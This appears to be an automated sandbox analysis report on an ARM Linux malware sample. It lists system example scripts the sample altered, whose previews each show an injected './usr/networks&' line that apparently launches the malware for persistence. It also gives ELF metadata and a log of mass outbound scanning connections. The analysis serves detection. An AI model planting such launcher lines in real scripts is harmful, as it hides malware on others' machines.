                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):92
                                                                                                                                Entropy (8bit):4.373538165973413
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVCghzalTFgZNLdMRveMgoOORgn:whzalTFgZNpMRGMgTn
                                                                                                                                MD5:15DD9BBF0482D9ADCED6141F43FC3C89
                                                                                                                                SHA1:F4416E70988E52171A2F7027509F98AAE444E8B6
                                                                                                                                SHA-256:CB678F95B78104B7BD05D11C5AF75843331744E2EAB1504A32627FB30DE17238
                                                                                                                                SHA-512:39C8DD448D3D1F8C4BAECB16A395BC55EA2554E4ED627743FC26A76B12C750CE451BC3CE72AEFF94286A260DCB06AC016AE44F9BD3A12372F1DD31776783FE62
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/ifupdown/examples/pcmcia-compat.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):519
                                                                                                                                Entropy (8bit):5.218301073324955
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:5HUuJUHUd82RPHUAOBJ6gMWGwWSTsyzEblTKfahBUlTGNCgTn:50QU0NRP0L6g/gfbleqUlw
                                                                                                                                MD5:7CE36959719763E25A79EF6FBE77FD68
                                                                                                                                SHA1:3D32B1EF561E7CDD58B69D01B30F6F23D339805D
                                                                                                                                SHA-256:2C2DA71A12186FDDE2BDFAEA192105B1010C1279BB82334185690788E2EFAF79
                                                                                                                                SHA-512:4ACE6DF91473556C67C22C26FA905D93E6BB08D564851AC21BED82609DA4990D032FE81884214CDAA0A149FDEF4D2393CB2A02EE42CDA2743B9BD017918D6605
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.if [ ! -e /etc/pcmcia/shared ]; then exit 1; fi..pcmcia_shared () {... /etc/pcmcia/shared.}..iface="$1"..# /etc/pcmcia/shared sucks.pcmcia_shared "start" $iface.usage () {..exit 1.}..get_info $iface.HWADDR=`/sbin/ifconfig $DEVICE | sed -n -e 's/.*addr \([^ ]*\) */\1/p'`..which="".while read glob scheme; do..if [ "$which" ]; then continue; fi..case "$SCHEME,$SOCKET,$INSTANCE,$HWADDR" in...$glob) which=$scheme ;;..esac.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/ifupdown/examples/ping-places.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):633
                                                                                                                                Entropy (8bit):4.881818972878624
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:5EmBJQX+U2/lTxroNurUQm6k0fQmje5jrGlTGNCgTn:hQWldrK8Dq0o+e1Glw
                                                                                                                                MD5:99E4E569B07969486DA912C2B9A33E23
                                                                                                                                SHA1:3BAA43B8E0D2B693C426DDA2FA6D67DEAEADB09C
                                                                                                                                SHA-256:3C5803C83626B98195C7F48B7B83D131670DFA9541EDB8B30915C684FD39CCB9
                                                                                                                                SHA-512:8BAE9DC8E5F540044980649EF028FEF8C4FE945B05578EE1DB963A32AABC53F7D24FCD5DDB396FB9430E4CDFB6E1E6F19A535A1790072F5750D961F4FB8E3214
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.if [ `id -u` -ne 0 ] || [ "$1" = "" ]; then exit 1; fi..if [ -x /usr/bin/fping ]; then..PING="/usr/bin/fping".else..PING="/bin/ping -c 2".fi..iface="$1".which=""..while read addr pingme scheme; do..if [ "$which" ]; then continue; fi...#echo " Trying $addr & $pingme ($scheme)" >&2...ip addr add $addr dev $iface >/dev/null 2>&1..ip link set $iface up >/dev/null 2>&1...if $PING $pingme >/dev/null 2>&1; then...which="$scheme"...fi..ip link set $iface down >/dev/null 2>&1..ip addr del $addr dev $iface >/dev/null 2>&1.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/lm-sensors/examples/daemon/healthd.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):266
                                                                                                                                Entropy (8bit):4.736279036741599
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:a5z9kOtWR2xokRVic6v3ApkRVX1dhlz4n:a53tPSjnz4n
                                                                                                                                MD5:E97AC4982B9BDFC8ED84ADA38E7BA000
                                                                                                                                SHA1:DE41A53FAE2E629E10235800917CDE6B2E0301AC
                                                                                                                                SHA-256:DADFB755A5E8D372A17BA4A4C8DC9DFB87AF4AD674EC8760617A16772FB2FFA4
                                                                                                                                SHA-512:B0035AA0879CE1F07F05B1CC3ABFD6F06C38D617D3A03248520B9B2F9790B6CE78156741330B2D4FE90A6BABF5493F944F281CE1BBE3B49864D35F4DF0F97314
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit.fi..while true.do. sleep 15. sensors_state=$(sensors). if [[ "$sensors_state" =~ 'ALARM' ]]. then. echo "$sensors_state" | mail -s '**** Hardware Health Warning ****' $ADMIN_EMAIL. sleep 600. fi.done../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2712
                                                                                                                                Entropy (8bit):5.4524991837552035
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9ZH0GXMZP9SFDAWxuQNa2K0uVl2dv4i:yF/E/l3XMZgNyZRo
                                                                                                                                MD5:A148FED2694A1A82F4ABF9A28D0293DC
                                                                                                                                SHA1:4652F09BF1B6FB1859FB4816EFB666AE371C13E6
                                                                                                                                SHA-256:8E15D1F50B0C524C72F1AB62314D647BF610D9B15952A0FEABA439C111868D7D
                                                                                                                                SHA-512:9E3AD1B35163A6875351B4028C473277FD120F7159D8E0F0BDA66BF6E0205AAA4ABA5053E9B30E702D99F15FDF5F5A1486216F7B4B7ED667807DF487E75777E8
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                                                /usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2564
                                                                                                                                Entropy (8bit):5.346461718403454
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9Zgz5QcJdcg63JI7+thz3pDsZdRtNzazELX:yF/E/lQ5QcJz7+tN3pAbRtJazELX
                                                                                                                                MD5:5A7BF4FFD03AE3B45F7EF8500A88D63C
                                                                                                                                SHA1:DBFF57314EAD3467F2357BF20E7D40FC20AE846C
                                                                                                                                SHA-256:8221FFC6B5CE193B173F22C873712D38673239A36E2E1C5F931F040A9D96440F
                                                                                                                                SHA-512:735D29AC37C532983BDCC294F401FF0B65B836A4012276266D68A249262EF50506742622163697A1F5665C4FD1761BE33006199F313E21DAA91236E7CD09632A
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                                                /usr/share/doc/mdadm/examples/mdadd.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9649
                                                                                                                                Entropy (8bit):5.350733164859712
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:mjHnCbuuH+ycHcTK8K8Ks89tg8C8Wdq7cmwc9bVxoY2uwt6fqI9lAnVKS4ID7KMz:ms7hBBC7pWdSK6SI8KzK77
                                                                                                                                MD5:4E3AA249886275CE240D98F18CCB0B12
                                                                                                                                SHA1:0E0A966CB506E61DE4F27571D3D3EF973AE70A94
                                                                                                                                SHA-256:12D9472701FC5E974C36D6FB456F43063EC370CAB5AE42AF8E880C76031FD5B8
                                                                                                                                SHA-512:5117AEB0CA27616A88CDB5C358078C2DF29784037C9D0CDFFE55F54441EBDC81B19FF6CB1356355EC35DFCABE0FD4AC514B18227ED78D486F66054CAD9E226FE
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 2. fi.}...sanity_check().{. if [ "$(id -u)" != "0" ]; then . printf "\033[40m\033[1;31mERROR: Root check FAILED (you MUST be root to use this script)! Quitting...\n\033[0m" >&2. exit 1. fi.. check_binary mdadm. check_binary sfdisk. check_binary dd. check_binary awk. check_binary grep. check_binary sed. check_binary cat.. if [ -z "$SOURCE" ] || [ -z "$TARGET" ]; then. echo "ERROR: Bad or missing argument(s)" >&2. show_help;. exit 4. fi.. if ! echo "$SOURCE" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Source device $SOURCE does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if ! echo "$TARGET" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Target device $TARGET does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if echo "$SOURCE" |grep -q 'md[0-9]'; then. printf "\033[40m\033[1;31mERROR: The source device specified is an md-device! Quitting...\n\033[0m" >&2. e
                                                                                                                                /usr/share/doc/netcat-openbsd/examples/dist.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):46
                                                                                                                                Entropy (8bit):3.925523369006428
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                                                MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                                                SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                                                SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                                                SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/tmux/examples/bash_completion_tmux.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/xdotool/examples/ffsp.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                                                Entropy (8bit):5.819679405566689
                                                                                                                                TrID:
                                                                                                                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                                                File name:nT7K5GG5km
                                                                                                                                File size:307960
                                                                                                                                MD5:eec5c6c219535fba3a0492ea8118b397
                                                                                                                                SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
                                                                                                                                SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
                                                                                                                                SHA512:3482c8324a18302f0f37b6e23ed85f24fff9f50bb568d8fd7461bf57f077a7c592f7a88bb2e1c398699958946d87bb93ab744d13a0003f9b879c15e6471f7400
                                                                                                                                SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                                                File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                                                                                                                Static ELF Info

                                                                                                                                ELF header

                                                                                                                                Class:ELF32
                                                                                                                                Data:2's complement, little endian
                                                                                                                                Version:1 (current)
                                                                                                                                Machine:ARM
                                                                                                                                Version Number:0x1
                                                                                                                                Type:EXEC (Executable file)
                                                                                                                                OS/ABI:UNIX - System V
                                                                                                                                ABI Version:0
                                                                                                                                Entry Point Address:0x8194
                                                                                                                                Flags:0x4000002
                                                                                                                                ELF Header Size:52
                                                                                                                                Program Header Offset:52
                                                                                                                                Program Header Size:32
                                                                                                                                Number of Program Headers:5
                                                                                                                                Section Header Offset:307280
                                                                                                                                Section Header Size:40
                                                                                                                                Number of Section Headers:17
                                                                                                                                Header String Table Index:16

                                                                                                                                Sections

                                                                                                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                                                NULL0x00x00x00x00x0000
                                                                                                                                .initPROGBITS0x80d40xd40x100x00x6AX004
                                                                                                                                .textPROGBITS0x80f00xf00x34a980x00x6AX0016
                                                                                                                                .finiPROGBITS0x3cb880x34b880x100x00x6AX004
                                                                                                                                .rodataPROGBITS0x3cb980x34b980xb9d00x00x2A008
                                                                                                                                .ARM.extabPROGBITS0x485680x405680x180x00x2A004
                                                                                                                                .ARM.exidxARM_EXIDX0x485800x405800x1280x00x82AL204
                                                                                                                                .eh_framePROGBITS0x510000x410000x40x00x3WA004
                                                                                                                                .tbssNOBITS0x510040x410040x80x00x403WAT004
                                                                                                                                .init_arrayINIT_ARRAY0x510040x410040x40x00x3WA004
                                                                                                                                .fini_arrayFINI_ARRAY0x510080x410080x40x00x3WA004
                                                                                                                                .data.rel.roPROGBITS0x510100x410100x180x00x3WA004
                                                                                                                                .gotPROGBITS0x510280x410280xb80x40x3WA004
                                                                                                                                .dataPROGBITS0x510e00x410e00x9ec80x00x3WA008
                                                                                                                                .bssNOBITS0x5afa80x4afa80x25b900x00x3WA008
                                                                                                                                .ARM.attributesARM_ATTRIBUTES0x00x4afa80x160x00x0001
                                                                                                                                .shstrtabSTRTAB0x00x4afbe0x900x00x0001

                                                                                                                                Program Segments

                                                                                                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                                                EXIDX0x405800x485800x485800x1280x1280x4R 0x4.ARM.exidx
                                                                                                                                LOAD0x00x80000x80000x406a80x406a80x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                                                                                                LOAD0x410000x510000x510000x9fa80x2fb380x6RW 0x8000.eh_frame .init_array .fini_array .data.rel.ro .got .data .bss
                                                                                                                                TLS0x410040x510040x510040x00x80x4R 0x4
                                                                                                                                GNU_STACK0x00x00x00x00x00x7RWE0x4

                                                                                                                                Network Behavior

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                May 1, 2021 20:24:33.074944973 CEST508007574192.168.2.20173.128.113.111
                                                                                                                                May 1, 2021 20:24:33.075262070 CEST529945555192.168.2.20151.70.88.212
                                                                                                                                May 1, 2021 20:24:33.075395107 CEST4058252869192.168.2.2037.127.116.2
                                                                                                                                May 1, 2021 20:24:33.075463057 CEST496928443192.168.2.2073.213.225.252
                                                                                                                                May 1, 2021 20:24:33.075570107 CEST442448443192.168.2.20164.95.80.124
                                                                                                                                May 1, 2021 20:24:33.075639009 CEST5040080192.168.2.203.220.46.172
                                                                                                                                May 1, 2021 20:24:33.075767994 CEST432147574192.168.2.2065.119.165.128
                                                                                                                                May 1, 2021 20:24:33.075830936 CEST5051880192.168.2.20159.30.196.217
                                                                                                                                May 1, 2021 20:24:33.075908899 CEST412687574192.168.2.20112.60.138.223
                                                                                                                                May 1, 2021 20:24:33.075974941 CEST4942252869192.168.2.2054.72.49.99
                                                                                                                                May 1, 2021 20:24:33.076066971 CEST5116280192.168.2.20186.177.110.211
                                                                                                                                May 1, 2021 20:24:33.076105118 CEST436368443192.168.2.20159.134.45.88
                                                                                                                                May 1, 2021 20:24:33.076148987 CEST400868443192.168.2.20169.108.151.225
                                                                                                                                May 1, 2021 20:24:33.076174021 CEST5825081192.168.2.2046.69.243.160
                                                                                                                                May 1, 2021 20:24:33.076215982 CEST4074080192.168.2.20159.184.117.36
                                                                                                                                May 1, 2021 20:24:33.076271057 CEST5054037215192.168.2.2045.71.81.134
                                                                                                                                May 1, 2021 20:24:33.076299906 CEST4692880192.168.2.2091.189.196.152
                                                                                                                                May 1, 2021 20:24:33.076328039 CEST427568080192.168.2.20187.65.235.163
                                                                                                                                May 1, 2021 20:24:33.076348066 CEST475388443192.168.2.20133.182.208.68
                                                                                                                                May 1, 2021 20:24:33.076380968 CEST4045880192.168.2.20105.202.173.103
                                                                                                                                May 1, 2021 20:24:33.076426983 CEST609147574192.168.2.20192.37.11.14
                                                                                                                                May 1, 2021 20:24:33.076462984 CEST3660080192.168.2.20128.34.103.41
                                                                                                                                May 1, 2021 20:24:33.076483965 CEST598885555192.168.2.2065.169.70.71
                                                                                                                                May 1, 2021 20:24:33.076510906 CEST5800480192.168.2.20185.146.156.163
                                                                                                                                May 1, 2021 20:24:33.076549053 CEST523787574192.168.2.2096.200.64.71
                                                                                                                                May 1, 2021 20:24:33.076606035 CEST4511080192.168.2.20122.157.60.54
                                                                                                                                May 1, 2021 20:24:33.076625109 CEST539368080192.168.2.2099.231.44.225
                                                                                                                                May 1, 2021 20:24:33.076666117 CEST403825555192.168.2.2088.83.215.123
                                                                                                                                May 1, 2021 20:24:33.076735973 CEST601887574192.168.2.20112.188.233.56
                                                                                                                                May 1, 2021 20:24:33.076742887 CEST5026280192.168.2.20106.180.217.144
                                                                                                                                May 1, 2021 20:24:33.076790094 CEST338885555192.168.2.20177.228.76.105
                                                                                                                                May 1, 2021 20:24:33.076858044 CEST383788080192.168.2.20196.250.243.57
                                                                                                                                May 1, 2021 20:24:33.076885939 CEST5162480192.168.2.2080.6.216.131
                                                                                                                                May 1, 2021 20:24:33.076914072 CEST6038837215192.168.2.20151.160.250.99
                                                                                                                                May 1, 2021 20:24:33.076956987 CEST3625652869192.168.2.20141.215.180.231
                                                                                                                                May 1, 2021 20:24:33.077071905 CEST3352680192.168.2.2018.21.159.227
                                                                                                                                May 1, 2021 20:24:33.077115059 CEST524247574192.168.2.2053.12.181.226
                                                                                                                                May 1, 2021 20:24:33.077157021 CEST3583052869192.168.2.2072.240.24.193
                                                                                                                                May 1, 2021 20:24:33.077181101 CEST488325555192.168.2.20168.237.187.123
                                                                                                                                May 1, 2021 20:24:33.077229977 CEST583288080192.168.2.2060.222.236.176
                                                                                                                                May 1, 2021 20:24:33.077260017 CEST576988080192.168.2.2045.220.233.11
                                                                                                                                May 1, 2021 20:24:33.077307940 CEST5985680192.168.2.2054.48.115.122
                                                                                                                                May 1, 2021 20:24:33.077318907 CEST4880080192.168.2.2065.123.42.165
                                                                                                                                May 1, 2021 20:24:33.077363014 CEST3936849152192.168.2.20188.61.141.250
                                                                                                                                May 1, 2021 20:24:33.077419043 CEST536825555192.168.2.20189.51.61.124
                                                                                                                                May 1, 2021 20:24:33.077457905 CEST3812280192.168.2.2099.79.97.187
                                                                                                                                May 1, 2021 20:24:33.077497005 CEST531688443192.168.2.2082.32.209.151
                                                                                                                                May 1, 2021 20:24:33.077531099 CEST4949080192.168.2.20111.39.224.122
                                                                                                                                May 1, 2021 20:24:33.077558994 CEST536205555192.168.2.2054.139.218.167
                                                                                                                                May 1, 2021 20:24:33.077608109 CEST4220080192.168.2.20218.150.197.195
                                                                                                                                May 1, 2021 20:24:33.077637911 CEST4104480192.168.2.20111.99.121.168
                                                                                                                                May 1, 2021 20:24:33.077687979 CEST3931649152192.168.2.2054.194.243.156
                                                                                                                                May 1, 2021 20:24:33.077727079 CEST3379881192.168.2.20161.170.180.99
                                                                                                                                May 1, 2021 20:24:33.077747107 CEST540328080192.168.2.20219.190.141.219
                                                                                                                                May 1, 2021 20:24:33.077769995 CEST4088280192.168.2.20206.109.170.179
                                                                                                                                May 1, 2021 20:24:33.077800989 CEST4522852869192.168.2.20102.247.160.88
                                                                                                                                May 1, 2021 20:24:33.077827930 CEST570208443192.168.2.20178.236.3.160
                                                                                                                                May 1, 2021 20:24:33.077860117 CEST3848280192.168.2.20150.12.7.99
                                                                                                                                May 1, 2021 20:24:33.077899933 CEST4454881192.168.2.2042.112.107.113
                                                                                                                                May 1, 2021 20:24:33.077927113 CEST523108080192.168.2.20214.58.190.175
                                                                                                                                May 1, 2021 20:24:33.077960968 CEST5900080192.168.2.20154.204.104.141
                                                                                                                                May 1, 2021 20:24:33.077996016 CEST5993237215192.168.2.2015.81.245.80
                                                                                                                                May 1, 2021 20:24:33.078020096 CEST6090652869192.168.2.203.31.11.51
                                                                                                                                May 1, 2021 20:24:33.078041077 CEST382868080192.168.2.208.231.233.201
                                                                                                                                May 1, 2021 20:24:33.078078985 CEST507548080192.168.2.20161.95.111.90
                                                                                                                                May 1, 2021 20:24:33.078110933 CEST494508443192.168.2.20115.251.170.50
                                                                                                                                May 1, 2021 20:24:33.078138113 CEST4354880192.168.2.2096.214.159.177
                                                                                                                                May 1, 2021 20:24:33.078169107 CEST401365555192.168.2.2021.210.48.60
                                                                                                                                May 1, 2021 20:24:33.078207970 CEST374088080192.168.2.2019.228.27.33
                                                                                                                                May 1, 2021 20:24:33.078259945 CEST595487574192.168.2.20198.75.210.198
                                                                                                                                May 1, 2021 20:24:33.078293085 CEST577345555192.168.2.20157.111.93.206
                                                                                                                                May 1, 2021 20:24:33.078315973 CEST5329680192.168.2.20176.220.61.61
                                                                                                                                May 1, 2021 20:24:33.078361988 CEST5385437215192.168.2.208.191.54.125
                                                                                                                                May 1, 2021 20:24:33.078382969 CEST5908680192.168.2.20179.177.160.203
                                                                                                                                May 1, 2021 20:24:33.078407049 CEST362228443192.168.2.2083.169.154.146
                                                                                                                                May 1, 2021 20:24:33.078430891 CEST4047081192.168.2.2028.20.175.209
                                                                                                                                May 1, 2021 20:24:33.078485012 CEST5405649152192.168.2.2011.0.46.244
                                                                                                                                May 1, 2021 20:24:33.078511953 CEST5005449152192.168.2.2046.138.124.14
                                                                                                                                May 1, 2021 20:24:33.078545094 CEST5587637215192.168.2.2048.57.169.235
                                                                                                                                May 1, 2021 20:24:33.078561068 CEST5230280192.168.2.20222.196.38.86
